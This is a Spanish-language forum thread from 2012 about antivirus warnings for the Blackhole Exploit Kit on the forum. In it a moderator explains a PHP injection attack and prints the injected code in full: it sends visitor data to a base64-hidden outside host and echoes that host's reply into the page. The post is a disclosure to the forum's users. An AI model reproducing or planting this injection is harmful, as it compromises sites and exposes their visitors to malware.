Page 1 of 1
Blackhole Exploit Kit
Posted: 04 May 2012, 18:04
by Lautaro
Hola,
Este es un mensaje para los moderadores, especialmente, por lo que creo, para Manuel José.
Te cuento que el anti virus de mi computador no me deja entrar a la página ya que dice que hay una amenaza en ésta que es Blackhole Exploit Kit.
Sabes algo de eso?
Saludos y gracias,
Lautaro
Re: Blackhole Exploit Kit
Posted: 05 May 2012, 18:35
by nemesio espinoza
a mi tambien me aparece cada vez que abro la pagina, no dije nada antes porque pense que era mi computadora, pero parece que no ,otra cosa desde que entro a la pagina siempre tuve el mensaje de error en la pagina esto es frecuente. ¿que esta pasando?
Re: Blackhole Exploit Kit
Posted: 05 May 2012, 19:24
by shooter
x3
Especificamente utilizo el avast.
Saludos
Re: Blackhole Exploit Kit
Posted: 05 May 2012, 20:14
by Lautaro
Yo uso el AVG...
Re: Blackhole Exploit Kit
Posted: 05 May 2012, 20:59
by Manuel Jose
Usuarios de Avast y AVG están teniendo estos mensajes.
Para su tranquilidad:
Se trata de un mecanismo denominado "PHP Injection Attack" en donde nuestro sitio se ha visto afectado. En resumen, se agrega un código encriptado a la cabecera de ciertos ficheros *.php que redirigen al navegador a un sitio infectado.
Parte del código que se inserta en nuestros ficheros:
Code: Select all
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
Si decodificamos esto:
Code: Select all
aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==
Obtenemos esto:
Code: Select all
http://botstatisticupdate.com/stat/stat.php
Estoy trabajando para prevenir esta práctica en el futuro.
Muchas gracias por su paciencia.
Re: Blackhole Exploit Kit
Posted: 05 May 2012, 22:12
by ctorresmol
a mi me pasa que cuando abro el foro aparecen chicas desnudas everywere, por eso paso tanto tiempo conectado
Re: Blackhole Exploit Kit
Posted: 06 May 2012, 23:37
by Manuel Jose
Y ahora?
Re: Blackhole Exploit Kit
Posted: 07 May 2012, 15:28
by Gaushito
ctorresmol wrote:a mi me pasa que cuando abro el foro aparecen chicas desnudas everywere, por eso paso tanto tiempo conectado
ta madre....porque a mi no me ha pasado.....
Re: Blackhole Exploit Kit
Posted: 07 May 2012, 15:52
by Lautaro
Manuel Jose wrote:Y ahora?
Todo bien, sin problemas!!!
Muchas gracias Manuel José...
Saludos,
Lautaro
Posted: 07 May 2012, 16:00
by daweno
A ni tb me salían pero ya no buuuuuu!!!